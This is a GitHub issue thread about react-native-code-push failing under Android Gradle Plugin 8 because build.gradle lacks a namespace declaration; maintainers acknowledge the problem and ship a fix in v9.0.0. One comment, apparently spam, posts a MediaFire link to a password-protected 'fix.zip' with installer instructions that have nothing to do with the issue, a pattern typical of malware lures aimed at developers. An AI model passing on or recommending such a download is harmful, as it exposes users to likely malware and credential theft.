### ISSUE TITLE
Android build.gradle namespace on AGP 8

### ISSUE THREAD

**Issue by Axiivy-Jaeseok** [microsoft/react-native-code-push#2743]
Thanks so much for filing an issue or feature request! Please fill out the following (wherever relevant):

### Steps to Reproduce

Hello, I received a notification from Google requiring me to update the TargetSDK of my Android app to version 34. To comply with this, I migrated my Gradle version from 7 to 8. However, I encountered a namespace error during the process. Upon investigation, I found that AGP 8 requires the namespace to be explicitly defined in the android section of the build.gradle file. The other SDKs I am using manage this by conditionally defining the namespace based on the Gradle version. As a temporary fix, I manually defined and added the namespace, as shown in the attached image. I’m wondering if there are any plans to address this issue in a future update.

Thank you for your attention.

### Expected Behavior
What you expected to happen?

### Actual Behavior
What actually happens?
```
  STACK TRACE AND/OR SCREENSHOTS
```

![스크린샷 2024-08-28 오후 1 11 36](https://github.com/user-attachments/assets/f0f4d264-1ddb-4d42-9ec9-3cd6ac1d53a7)

### Reproducible Demo

* Download https://github.com/microsoft/react-native-code-push/archive/master.zip and unzip. From `Examples` folder run `node create-app.js appName react-native@0.71.19 react-native-code-push@8.3.1` command to generate plain CodePushified React Native app. Please see description on top of `create-app.js` file content if needed
* If you can't reproduce the bug on it, provide us as much info as possible about your project

### Environment

* react-native-code-push version: 8.3.1
* react-native version: 0.72.4
* iOS/Android/Windows version:
* Does this reproduce on a debug build or release build?
* Does this reproduce on a simulator, or only on a physical device?

(The more info the faster we will be able to address it!)

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MikhailSuendukov** [comment]
Hello!
Thank you for reaching out to us. We will fix this issue and will keep you updated as soon as we have more details.

**Comment by Axiivy-Jaeseok** [comment]
@MikhailSuendukov 

Thank you for your support! I appreciate your quick response and efforts to resolve the issue. I’ll go ahead and close this issue now.

**Comment by Axiivy-Jaeseok** [comment]
@burakkgunduzz 

Yes, I manually add namespace from node_modules/react-native-code-push/build.gradle

**Comment by sanjeevyadavIT** [comment]
@Axiivy-Jaeseok what is the exact change that you did in node_modules, can you share here

**Comment by MikhailSuendukov** [comment]
We have successfully merged a pull request addressing this issue. The fix will be included in the upcoming release.

**Comment by MikhailSuendukov** [comment]
A fix for this issue was released with the AppCenter SDK ReactNative v9.0.0, so I'm closing this issue.
